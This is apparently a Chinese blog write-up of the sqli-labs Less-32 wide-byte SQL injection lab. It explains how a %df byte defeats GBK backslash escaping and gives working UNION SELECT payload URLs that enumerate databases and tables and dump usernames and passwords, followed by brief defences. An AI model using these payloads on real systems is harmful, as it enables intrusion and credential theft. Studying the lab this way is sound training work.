sqli-宽字节注入

最新推荐文章于 2024-01-12 23:31:28 发布
最新推荐文章于 2024-01-12 23:31:28 发布
阅读量151 收藏
点赞数
分类专栏: sqli-lab 自学
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47346400/article/details/114866818
版权

以下ppt来自大佬传送门

宽字节注入原理

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

初步探测:

http://sqli-labs:65/Less-32/?id=1'--

在这里插入图片描述
发现1’被转义为 ''所以判定为 宽字节注入
方法:在注入点后键入%df,然后按照正常的注入流程开始注入
原理:下图中的hint
== -1�’ union select 1,2,(select user())-- ==、由于和源代码中的 $id’产生闭合,所以就自然执行了 union select…
在这里插入图片描述

在这里插入图片描述

已知mysql注入的类型是宽字节了,下面就按照注入的基本流程走便是了

1.爆数据库
爆单个

http://sqli-labs:65/Less-32/?id=-1%df' union select 1,2,( ==select==schema_name from information_schema.schemata limit 0,1 )--+

在这里插入图片描述
爆多个

http://sqli-labs:65/Less-32/?id=-1%df' union select 1,2,( select group_concat(schema_name) from information_schema.schemata)--+

2.爆表

http://sqli-labs:65/Less-32/?id=-1%df' union select 1,2,( select TABLE_name from information_schema.TABLES WHERE table_schema=database() limit 0,1 )--+

在这里插入图片描述
3.爆字段

4.爆用户名和密码

http://sqli-labs:65/Less-32/?id=-1%df' union select 1,2,( select group_concat(username,0x3a,password) from users)--+

在这里插入图片描述

宽字节的防御

1.使用utf-8,避免宽字节注入;
(ps:不仅在gbk,韩文,日文等等都是宽字节,都有可能存在宽字节注入漏洞。)
2.mysql_real_escape_string,mysql_set_charset(‘gbk’,$conn);
3.可以设置参数,character_set_client=binary

一只会飞的猪-FlaggingPig1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli32关:宽字节注入
dirich的博客
06-13 377
宽字节顾名思义就是两个及以上的字节表示一个中文汉字。在sql注入中,当用户输入中包含特殊字符,比如(单引号’),(双引号"),(斜杠/)等,为了过滤用户输入的这些特殊字符,会在字符前面加一个\转义字符对特殊字符进行转义。而大多数网站使用utf-8编码,utf-8编码会认为一个中文字符占三个字节;而后端mysql常用GBK编码,GBK编码认为一个中文占两个字节。所以针对这个原理,我们可以构造中文汉字来绕过字符转义。
sqli-Lesson32 宽字节注入题解
最新发布
qq_65240014的博客
01-12 1051
GB2312是被GBK兼容的,它的高位范围是0xA1-0xF7,低位范围是0xA1-0xFE(0x5C不在该范围内),因此不能使用编码吃掉%5c。宽字节注入是利用mysql的一个特性,mysql在使用GBK编码(GBK就是常说的宽字节之一,实际上只有两字节)的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围)若是改成1%df%5c,在sql进行gbk编码的时候会将%df和%5c作为一个宽字节进行解码,就会变成汉字“如果一个字符的大小是两个字节的,成为宽字节。
SQL注入之宽字节注入
qq_68233961的博客
07-24 1904
SQL注入之宽字节注入
渗透测试-SQL注入之宽字节注入
lza20001103的博客
04-20 8297
渗透测试-SQL注入之宽字节注入
sqli-labs/less-24;宽字节注入
xiaochenhang的博客
08-18 329
2、 当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸。1、在使用gbk的编码情况下,一个中文占了两个字节;中文的第一个字节加上被转义的特殊字符(\')后,转义符\会被认为是中文的第二个字节,这样单引号'就脱离了转义,形成了宽字节注入;这个语句没问题,可是'security' 两侧单引号也会被转义,这里使用嵌套查询来逃逸;4、联合查询,判断回显点;...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
宽字节注入详解-附件资源
03-05
宽字节注入详解-附件资源
sqli-labs:less-32(宽字节注入
羽的博客
10-19 3056
宽字节注入 产生原因: 1、mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围) 2、mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。 mysqli_real_escape_string(*connection,escapestring*) connection 必需。规定要使用的 MySQL 连接 escapestr...
宽字节注入
03-23 226
0x0 背景 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称其字符为宽字节. 所有英文默认占一个字节,汉字占两个字节 常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等 0x1 宽字节注入原理 程序员为了防止sql注入,对用户输入中的单引号(’)进行处理,在单引号前加上斜杠(\)进行转义...
sqli-labs————宽字节注入(可以用于绕过滤了单引号或者\的WAF)
Fly_鹏程万里
05-19 2585
宽字节注入的原理:原理:mysql在使用GBK编码的时候,会认为两个字符为一个汉字,例如%aa%5c就是一个汉字(前一个ascii码大于128才能到汉字的范围)。我们在过滤 ' 的时候,往往利用的思路是将 ' 转换为 \' 。宽字节注入实现:因此我们在此想办法将 ' 前面添加的 \ 除掉,一般有两种思路:(1)%df吃掉 \ 具体的原因是urlencode('\) = %5c%27,我们在%5c%...
mysql sql宽字节注入_sqli-宽字节注入
weixin_35330796的博客
01-18 122
0x0 背景当某字符的大小为一个字节时,称其字符为窄字节.当某字符的大小为两个字节时,称其字符为宽字节.所有英文默认占一个字节,汉字占两个字节常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等0x1 宽字节注入原理程序员为了防止sql注入,对用户输入中的单引号(’)进行处理,在单引号前加上斜杠(\)进行转义,这样被处理后的sql语句中,单引号不再具有‘作用’,...
(学习)SQL注入--宽字节注入
Huang921的博客
11-21 3860
SQL注入–宽字节注入实践
Sqli-labs Less32-37 宽字节注入绕过过滤函数
kevinhanser
08-10 2188
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 32: GET - Bypass custom filter adding slashes to dangerous chasrs 原理 mysql 在使用GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个ascii 码大于128 才能到汉字的范围)。我们在...
sqli-lib-(32) 宽字节注入
qq_44133136的博客
07-29 554
sqli宽字节注入
SQL注入:sqli-labs 32 宽字节注入
Zeker62的博客
08-12 454
http://127.0.0.1/sqli/Less-32/?id=1不报错 http://127.0.0.1/sqli/Less-32/?id=1'发现下面的信息框里面多了一个转义字符: Hint: The Query String you input is escaped as : 1’ The Query String you input in Hex becomes : 315c27 再尝试:http://127.0.0.1/sqli/Less-32/?id=1"发现仍然被转义。 显然第二行显示信.
sqli-labs宽字节注入关卡
09-27
sqli-labs宽字节注入关卡是指在sqli-labs闯关中的相关关卡,用于学习和理解宽字节注入漏洞。它是通过将character_set_client设置为binary来解决宽字节或多字节问题的方法,从而有效避免宽字符注入。通过使用工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值